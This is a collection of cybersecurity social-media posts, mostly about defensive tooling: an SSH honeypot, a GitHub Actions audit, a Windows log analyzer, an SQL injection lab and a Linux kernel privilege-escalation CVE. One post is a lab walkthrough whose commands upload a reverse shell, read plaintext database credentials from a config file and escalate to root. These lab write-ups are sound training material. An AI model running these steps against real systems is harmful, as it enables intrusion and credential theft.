🍯Built an SSH Honeypot from scratch. Here's what I learned.

Instead of faking a shell and hoping attackers don't notice, I built a Man-in-the-Middle proxy — the honeypot sits between the attacker and a real decoy VM, forwarding everything bidirectionally while logging every credential and command. Attackers get a fully functional Linux shell. They have no idea they're being watched.

Some of the decisions I'm proud of:
→ Randomized authentication delay — accepts login after a random number of attempts per attacker. A honeypot that accepts every password immediately is trivially detected. This one behaves like a real server with a strong password.
→ Credential memory — once credentials are accepted, repeat logins stay consistent. A real server remembers your password. So does this one.
→ Dual logging — real-time .log file for live monitoring + SQLite for structured queries. When it's deployed on a public IP, I'll be able to query the most common passwords attackers use, attack frequency by IP, and what commands they run after getting in.

Tech stack: Python, Paramiko, Socket, Threading, SQLite, python-dotenv

Building both sides — offensive and defensive — is the fastest way to actually understand security. If you know how a honeypot works, you know how to bypass one. If you know how to bypass one, you know how to harden it.

Code is on my GitHub. Link in comments.

#CyberSecurity #EthicalHacking #Python #SSH #PenTesting #Networking #InfoSec #StudentProject #SOCAnalyst
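The two authentication decisions above (a random per-attacker acceptance point plus credential memory), as an added example that is not the post's or the repository's code; the class names, the SQLite table and the per-IP keying are assumptions:

```python
import random
import sqlite3
import threading
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass
class AttackerState:
    threshold: int                              # failed attempts demanded before we "accept"
    attempts: int = 0
    accepted: Optional[Tuple[str, str]] = None  # (username, password) remembered after acceptance


class AuthPolicy:
    """Hypothetical per-source-IP authentication policy for a proxying SSH honeypot."""

    def __init__(self, db_path=":memory:", min_attempts=2, max_attempts=6, seed=None):
        self._rng = random.Random(seed)           # seed only so the behaviour is testable
        self._bounds = (min_attempts, max_attempts)
        self._state = {}                          # ip -> AttackerState
        self._lock = threading.Lock()             # one policy shared by all client threads
        self._db = sqlite3.connect(db_path, check_same_thread=False)
        self._db.execute("CREATE TABLE IF NOT EXISTS auth_attempts "
                         "(ip TEXT, username TEXT, password TEXT, accepted INTEGER)")

    def check(self, ip, username, password):
        """Return True when the honeypot should let this login through to the decoy VM."""
        with self._lock:
            st = self._state.get(ip)
            if st is None:
                st = AttackerState(threshold=self._rng.randint(*self._bounds))
                self._state[ip] = st
            st.attempts += 1
            if st.accepted is not None:
                ok = (username, password) == st.accepted   # credential memory
            else:
                ok = st.attempts >= st.threshold            # randomized acceptance point
                if ok:
                    st.accepted = (username, password)
            self._db.execute("INSERT INTO auth_attempts VALUES (?, ?, ?, ?)",
                             (ip, username, password, int(ok)))
            self._db.commit()
            return ok

    def top_passwords(self, n=5):
        """Most frequently tried passwords: the structured query the post plans to run."""
        return self._db.execute(
            "SELECT password, COUNT(*) AS c FROM auth_attempts "
            "GROUP BY password ORDER BY c DESC, password LIMIT ?", (n,)).fetchall()
```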
This Linux bug gives you root without touching the file on disk.

I ran CVE-2026-31431 on my main machine. 732 bytes of Python. Standard library. One execution. → root.

No race condition. No crashes. No version-specific offsets. Just a clean, deterministic privilege escalation.

Here is the part that should worry you. The exploit does not modify the binary. It writes 4 bytes into the page cache, the in-memory copy the kernel actually executes. So Tripwire sees nothing. AIDE sees nothing. Inotify sees nothing. Your file integrity monitoring is blind.

This is not Dirty Cow. Not Dirty Pipe. Those were probabilistic. This is deterministic. Every single time.

The root cause is subtle.
- 2011: authencesn for IPsec ESN
- 2015: AF_ALG exposed to userspace
- 2017: page cache optimization made it writable

Each change made sense. Together, they created a privilege escalation sitting unnoticed for years.

Now the part that should make you pause. This was found by an AI scanner in about 1 hour from a single prompt targeting the Linux crypto subsystem.

This is not remote. You need initial access. But chain it with web RCE, stolen SSH creds, or a compromised container and you are done.

We're not just dealing with bugs anymore. We're dealing with systems that can find them faster than we can reason about them.

#Linux #CVE #KernelSecurity #PrivEsc #CyberSecurity #CopyFail
🚨 Recently, there have been more incidents related to software supply chain attacks, especially in GitHub Actions.

Originally developed during an active incident response involving malicious axios npm packages (1.14.1 & 0.30.4). My EM (Goutham Madhwaraj) asked me to review our workflows and check for potential risks from third-party actions.

To make it faster, I built this tool: GitHub Actions Supply Chain Audit Tool

🔍 What it does:
- Scan GitHub Actions workflows
- Detect third-party / external actions
- Flag risky usage (like unpinned versions)
- Help quick security review

Goal:
👉 Reduce manual effort
👉 Make audit faster
👉 Improve visibility on risks

Sharing in case it's useful: 👉 https://lnkd.in/gn8UzGke

#CyberSecurity #DevSecOps #AppSec #SupplyChainSecurity #GitHubActions
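The check the post describes (find third-party `uses:` references and flag the ones not pinned to a full commit SHA), as an added example that is not the audit tool's own code; the sample workflow, the placeholder SHA and the set of owners treated as first-party are assumptions:

```python
import re
from dataclasses import dataclass

# Constructed sample workflow (not from any real repository); the 40-hex SHA is a placeholder.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@8f152de45cc7d3a7b2f0b8b4a0e4c2a5f0e9b1c2  # placeholder SHA
      - uses: some-org/cool-action@main
      - uses: some-org/other-action@v1.2.3
      - uses: ./.github/actions/local-thing
      - uses: docker://alpine:3.19
"""

USES_RE = re.compile(r"""^\s*-?\s*uses:\s*['"]?([^'"\s#]+)""")
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")
FIRST_PARTY_OWNERS = {"actions", "github"}   # assumption: owners treated as trusted

@dataclass(frozen=True)
class Finding:
    line: int
    action: str
    ref: str
    third_party: bool
    pinned: bool          # True only when ref is a full 40-hex commit SHA

def audit_workflow(text):
    """Return one Finding per remote `uses:` reference in a workflow file."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if not m:
            continue
        uses = m.group(1)
        if uses.startswith("./") or uses.startswith("docker://"):
            continue   # local composite actions and container images need a different check
        action, _, ref = uses.partition("@")
        owner = action.split("/")[0]
        findings.append(Finding(n, action, ref, owner not in FIRST_PARTY_OWNERS,
                                bool(FULL_SHA_RE.match(ref))))
    return findings

def risky(findings):
    """Third-party actions floating on a tag or branch: a tag move or branch push changes what runs."""
    return [f for f in findings if f.third_party and not f.pinned]
```

A tag such as v1.2.3 is mutable, so pinning to the SHA (and keeping a comment with the tag for readability) is what turns the flagged rows green.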
I've been building a tool called Pulse. It's a Python-based Windows event log analyzer for threat detection. It reads .evtx log files, flags suspicious activity, and outputs a clean report. No enterprise SIEM license required.

So far it detects 11 threat patterns, including brute force attempts, privilege escalation, antivirus being disabled, and suspicious service installations. It also correlates events into attack chains, like spotting when a brute force leads to a successful login followed by a new user account being created.

34 unit tests. CLI flags. HTML reports with color-coded severity.

Still a lot on the roadmap, but I'm shipping features daily and learning how attacks actually work at the log level.

Repo is public: https://lnkd.in/eaSm6Cmf

#cybersecurity #blueteam #python #threatdetection #buildinpublic
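The attack-chain correlation the post mentions (failed logon burst, then a successful logon from the same source, then a new account), as an added example that is not Pulse's code; the record layout, the Security event IDs used (4625, 4624, 4720) and the thresholds are assumptions, and the events are constructed:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not Pulse test data): the fields a parsed .evtx Security event yields.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:%02d" % s, "id": 4625, "user": "admin", "src_ip": "203.0.113.9"}
    for s in range(0, 60, 10)                    # six failed logons in one minute
] + [
    {"time": "2024-05-01T10:01:05", "id": 4624, "user": "admin", "src_ip": "203.0.113.9"},
    {"time": "2024-05-01T10:03:40", "id": 4720, "user": "admin", "new_user": "svc_backup"},
    {"time": "2024-05-01T10:05:00", "id": 4625, "user": "bob", "src_ip": "198.51.100.4"},
    {"time": "2024-05-01T10:05:30", "id": 4624, "user": "bob", "src_ip": "198.51.100.4"},
]


def find_attack_chains(events, fail_threshold=5, window=timedelta(minutes=10)):
    """Correlate 4625 (failed logon) bursts -> 4624 (success) -> 4720 (account created)."""
    events = sorted(events, key=lambda e: e["time"])   # ISO timestamps sort lexically
    failures = defaultdict(list)                      # src_ip -> timestamps of failed logons
    chains = []
    for e in events:
        t = datetime.fromisoformat(e["time"])
        if e["id"] == 4625:
            failures[e["src_ip"]].append(t)
        elif e["id"] == 4624:
            recent = [f for f in failures.get(e["src_ip"], []) if t - f <= window]
            if len(recent) >= fail_threshold:          # success right after a burst = brute force worked
                chains.append({"src_ip": e["src_ip"], "user": e["user"], "failures": len(recent),
                               "login_at": t, "new_users": [], "severity": "high"})
        elif e["id"] == 4720:
            for c in chains:
                if c["user"] == e["user"] and timedelta(0) <= t - c["login_at"] <= window:
                    c["new_users"].append(e["new_user"])
                    c["severity"] = "critical"         # persistence established after the break-in
    return chains
```

The single failed logon from the second source never reaches the threshold, so only the first source produces a chain.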
I have just released a new project focused on one of the most persistent threats in web security: the SQL Injection Playground and Detection Engine. This platform is designed as a comprehensive educational tool for developers and security professionals to understand, detect, and mitigate SQLi vulnerabilities.

The system integrates three core components to provide a complete learning lifecycle:
- Vulnerable Web Application: A Flask-based environment featuring intentional flaws in login and search functionalities to demonstrate real-world exploitation.
- Automated Detection Engine: A tool that employs pattern matching, error detection, and timing analysis to identify vulnerabilities automatically.
- Educational Dashboard: An interactive interface providing side-by-side comparisons between vulnerable string concatenation and secure parameterized queries.

Key Technical Implementations:
- Attack Vectors: The engine successfully detects and demonstrates authentication bypass, UNION-based extraction, and time-based blind SQLi.
- Defensive Strategies: I have implemented and documented a 100% prevention rate using parameterized queries, input validation, and the principle of least privilege.
- Automated Reporting: The system generates detailed JSON logs and text-based security reports, simulating professional auditing workflows.

This project was built using Python, Flask, and SQLite3 to serve as a hands-on training ground for those looking to strengthen their secure coding practices.

Full Documentation and Source Code: https://lnkd.in/gBJVM2cq 👍

#CyberSecurity #AppSec #WebSecurity #Python #Flask #SQLInjection #InfoSec #SecureCoding #GitHub
TwoMillion Is the Machine That Proves You Don't Need a Single Exploit if You Just Know How to Read — JavaScript, API Responses, and Config Files Will Hand You Everything. (HTB)

👤 FuzzRaiders Team Member: Stager
🎯 Role: Internal Penetration Tester
🎓 Certified: CompTIA Security+
📜 Certificate In Progress: PNPT (TCM Security)

A JavaScript invite system. A hidden API. A forgotten .env file. Root via a kernel CVE. This lab shows how reading the application — not brute forcing it — unlocks every step of the chain, from invite code generation all the way to privilege escalation through CVE-2023-0386 (OverlayFS/FUSE), aligned with PNPT preparation.

🛠️ Focus Areas
• JS Deobfuscation — unpacking eval() to find hidden API endpoints
• API Abuse — IDOR to escalate is_admin without any authorization check
• OS Command Injection — unsanitized username parameter → reverse shell

📘 Key Learning Outcomes
• Read Before You Act — the answer is always in the code before it's in the response
• IDOR Still Wins — trusting client-supplied privilege values is a systemic failure
• Kernel CVEs Skip Everything — no sudo rule or file permission survives a vulnerable kernel

📂 Full Technical Write-up
🔗 GitHub: https://lnkd.in/d_hkNmiq

This work is part of FuzzRaiders' structured hands-on training and research program, where every lab, project, and technical study is formally documented, reviewed, and validated to ensure real-world applicability, methodological rigor and real-world security execution.

#FuzzRaiders #CyberSecurity #WebSecurity #HackTheBox #PNPT #RedTeam #PenetrationTesting #Linux
🚀 Tip of the Day: Don't Hardcode Secrets in Your Code

One of the fastest ways to get hacked is this 👇

❌ Writing things like:
API_KEY = "123456789"
DB_PASSWORD = "mypassword"

If your code is pushed to GitHub (even by mistake), your secrets are exposed.

✅ Best Practice: Use Environment Variables
Store sensitive data in a .env file instead:
API_KEY=your_api_key_here
DB_PASSWORD=your_password_here

Then access them securely in your code.

💡 Example (Node.js):
process.env.API_KEY

🔐 Bonus Tip: Always add your .env file to .gitignore so it never gets uploaded.

---

Small mistake… big consequences. Build securely from day one.

#TechTips #WebDevelopment #Programming #SoftwareEngineering #Developers #CyberSecurity
9 years. Thousands of engineers. Nobody noticed.

One researcher connected three dots inside the Linux kernel — and what he found shook the entire security community.

A 732-byte Python script now gives any local user instant root access on virtually every Linux machine released since 2017. No race condition. No special privileges. No traces left behind.

It is called Copy Fail. CVE-2026-31431.

The same week, a second vulnerability surfaced — Pack2TheRoot — letting unprivileged users install root-level software with zero authentication. It had been hiding for 14 years.

The exploit is already public. The patch is already available. Is your infrastructure protected?

Full technical breakdown in the article 👇 https://lnkd.in/d-Biwd8t

#CyberSecurity #Linux #ZeroDay #CVE202631431 #InfoSec #PatchManagement #CloudSecurity
🚀 Day 54/100 | 100 Days of OSCP&OSEP Knowledge — From Basics to Real Exploits

FunboxEasyEnum walkthrough | weak web security + poor credential handling + improper sudo privileges

🔎 Phase 1 — Reconnaissance
Started with Nmap scan:
nmap -sCV -A --min-rate 1000 <target-ip>
Key Findings:
• 22 — SSH
• 80 — Apache Web Server
➡️ Web application identified as the primary attack surface

🌐 Phase 2 — robots.txt Enumeration
Checked robots file:
curl -s http://<target-ip>/robots.txt
✔️ Found hint: Allow: Enum_this_Box
➡️ Indicated deeper enumeration required

📂 Phase 3 — Directory Enumeration
feroxbuster -u http://<target-ip> -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
✔️ Discovered: /mini.php
➡️ Exposed Zerion Mini Shell (file manager)

💥 Phase 4 — Exploitation (File Upload RCE)
✔️ No authentication required
✔️ No file validation
Uploaded PHP reverse shell and executed:
nc -lvnp 4444
✔️ Reverse shell received
whoami
www-data

🔑 Phase 5 — Credential Discovery
Read configuration file:
cat /etc/phpmyadmin/config-db.php
✔️ Found plaintext credentials

🔄 Phase 6 — Credential Reuse
Switched user:
su karla
✔️ Login successful using reused password

🔓 Phase 7 — Privilege Escalation
Checked sudo permissions:
sudo -l
✔️ Found: (ALL) ALL

👑 Final Access
sudo su
whoami
root
✔️ Full system compromise achieved

📺 YouTube: https://lnkd.in/deJ7DHmx
📸 Instagram: https://lnkd.in/gW9RgqHN
💬 Telegram: https://lnkd.in/dxT6s5pB
✍️ Medium: https://lnkd.in/diVViZHW

Strong fundamentals = strong exploitation 🔥

#OSCP #CyberSecurity #EthicalHacking #RedTeam #Linux #RCE #PrivilegeEscalation #Infosec #100DaysOfOSCP
Six weeks ago, Pulse was a script that printed findings to a terminal. Today it is a full security platform with a web dashboard, live monitoring, fleet management, and the ability to block suspicious IPs directly from a browser.

I built this while studying for my cybersecurity degree at WGU.

What Pulse does:
- Reads Windows event logs and flags suspicious activity
- Maps every finding to MITRE ATT&CK
- Tracks security scores across multiple machines
- Blocks malicious IPs directly to Windows Firewall from the dashboard
- Sends alerts via email, Slack, or Discord
- Generates PDF reports you can actually send to a manager

447 tests passing. 25 detection rules. Fully open source and free.

If you are a student, a junior analyst, or an IT admin who wants visibility into your Windows machines without paying for enterprise tools, give it a try.

GitHub: github.com/barrytd/Pulse
Full writeup in the comments.

#cybersecurity #blueteam #python #opensource #soc #siem #infosec #wgu
Copy Fail is generating a lot of buzz. What I think is important to know is that an exploit would need to use the Linux kernel AF_ALG module. Disable that module and the path is blocked, but so is access to any shared hardware-backed cryptographic operations applications might need.

Why would we want to disable a shared kernel capability, or basically any shared capability for that matter? Well, it gets back to security basics of compartmentalization and least (shared) code to enhance security. Any application or data that is important enough to require high security shouldn't be sharing cryptographic libraries or other kernel resources at all. There should be strict separation. The architecture and engineering standards should match the requirements of the data and applications in the environment.

What tends to be forgotten is you still have to go back and make sure unnecessary code/code paths are removed or disabled, even with physical separation.

#cybersecurity #vulnerability #hardening #standards #practices
https://lnkd.in/ez5eTvgf
GitHub Link: https://github.com/Yaseen-Rather/Honey_Pot_Cloud_Python